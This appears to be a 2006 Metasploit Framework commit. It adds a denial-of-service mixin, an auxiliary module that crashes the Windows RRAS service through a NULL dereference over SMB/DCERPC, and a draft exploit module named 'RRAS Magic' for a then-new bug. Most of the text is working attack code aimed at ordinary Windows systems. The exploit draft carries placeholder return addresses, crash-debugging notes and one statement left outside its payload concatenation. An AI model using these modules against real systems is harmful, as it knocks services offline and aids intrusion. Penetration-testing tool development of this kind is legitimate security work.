Added DOS aux modules

Temporarily added RRAS_MAGIC git-svn-id: file:///home/svn/incoming/trunk@3666 4d416f70-5f16-0410-b530-b9f4589650da
2006-06-15 15:52:01 +00:00 · 2006-06-15 15:52:01 +00:00 · 14dabc399e
parent 93eefee44f
commit 14dabc399e
4 changed files with 201 additions and 0 deletions
--- a/lib/msf/core/auxiliary.rb
+++ b/lib/msf/core/auxiliary.rb
@ -17,6 +17,7 @@ class Auxiliary < Msf::Module
 	# Auxiliary mixins
 	#
 	require 'msf/core/auxiliary/recon'
+	require 'msf/core/auxiliary/dos'
 	
 	#
 	# Returns MODULE_AUX to indicate that this is an auxiliary module.
--- a/lib/msf/core/auxiliary/dos.rb
+++ b/lib/msf/core/auxiliary/dos.rb
@ -0,0 +1,15 @@
+module Msf
+
+###
+#
+# This module provides methods for Denial of Service attacks
+#
+###
+
+module Auxiliary::Dos
+
+
+
+
+end
+end
--- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb
+++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb
@ -0,0 +1,74 @@
+require 'msf/core'
+
+module Msf
+
+class Auxiliary::Dos::Windows::Smb::RRAS_VLS_NULL_DEREF < Msf::Auxiliary
+
+	include Auxiliary::Dos
+	include Exploit::Remote::DCERPC	
+	include Exploit::Remote::SMB
+
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference',
+			'Description'    => %q{
+				This module triggers a NULL dereference in svchost.exe on
+			all current versions of Windows that run the RRAS service. This 
+			service is only accessible without authentication on Windows XP
+			SP1 (using the SRVSVC pipe). 
+			},
+			
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+
+				],
+			'Actions'     =>
+				[
+					['Attack'],
+				],
+			'DefaultAction' => 'Attack',
+			'DisclosureDate' => 'Jun 14 2006'
+		))
+			
+		register_options(
+			[
+				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
+			], self.class)
+						
+	end
+
+	def run
+		connect
+		smb_login
+		
+		case action.name
+		when 'Attack'
+
+			handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
+
+			print_status("Binding to #{handle} ...")
+			dcerpc_bind(handle)
+			print_status("Bound to #{handle} ...")
+			stb = [0, 0, 0, 0].pack('V*')
+			
+			print_status("Calling the vulnerable function...")
+			begin
+				dcerpc.call(0x0C, stb)
+			rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+			rescue => e
+				if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
+					raise e
+				end
+			end
+					
+		end
+
+		disconnect
+	end
+
+end
+end	
--- a/modules/exploits/windows/smb/rras_magic.rb
+++ b/modules/exploits/windows/smb/rras_magic.rb
@ -0,0 +1,111 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Smb::RRAS_MAGIC < Msf::Exploit::Remote
+
+	include Exploit::Remote::DCERPC
+	include Exploit::Remote::SMB
+
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Microsoft RRAS Magic',
+			'Description'    => %q{
+				New bug.
+			},
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					[ 
+						'Windows 2000 TEST',
+						{
+							'Ret'      => 0x01020304,
+						}
+					]														
+				],
+
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Jun 14 2006'))
+			
+		register_options(
+			[
+				OptString.new('SMBPIPE', [ true,  "The pipe name to use (router, srvsvc)", 'router']),
+			], self.class)
+						
+	end
+
+	def exploit	
+		
+		connect()
+		smb_login()
+		
+		handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
+	
+		print_status("Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		print_status("Bound to #{handle} ...")
+
+		# 0 - 6bd13c26 8b860c020000     mov     eax,[esi+0x20c]   ds:0023:0000020c=????????
+		#  RMprAdminServerGetInfo
+		
+		# 1 - 6bd13908 83b91c02000000   cmp dword ptr [ecx+0x21c],0x0 ds:0023:0000021c=????????
+		#  RRasAdminConnectionEnum
+		
+		# 2 - 6bd1392c 8b9088090000     mov     edx,[eax+0x988]   ds:0023:00000988=????????
+		#  RRasAdminConnectionGetInfo
+		
+		# 40 - 
+		#  RRouterInterfaceSetCredentialsEx
+
+
+		pat = Rex::Text.pattern_create(4000)
+		pat[2436, 4] = [-1].pack('V')
+		
+		pat[2464, 4] = "DOOT"
+		pat[2440, 4] = "REET"
+		pat[800, 4]  = "ABCD"
+		
+		pat[520, 4]  = [3].pack('V')
+		
+		# [2436] + &[800] + 0x 
+		
+		stb = 
+			NDR.long(2) + 
+			NDR.long(0) +
+			NDR.string(pat)
+			NDR.long(0x12345678)
+
+		begin
+			dcerpc.call(0x0c, stb)
+		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+			print_status("No response")
+		rescue => e
+			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
+				raise e
+			end
+		end
+
+		# Cleanup
+		handler
+		disconnect
+	end
+
+end
+end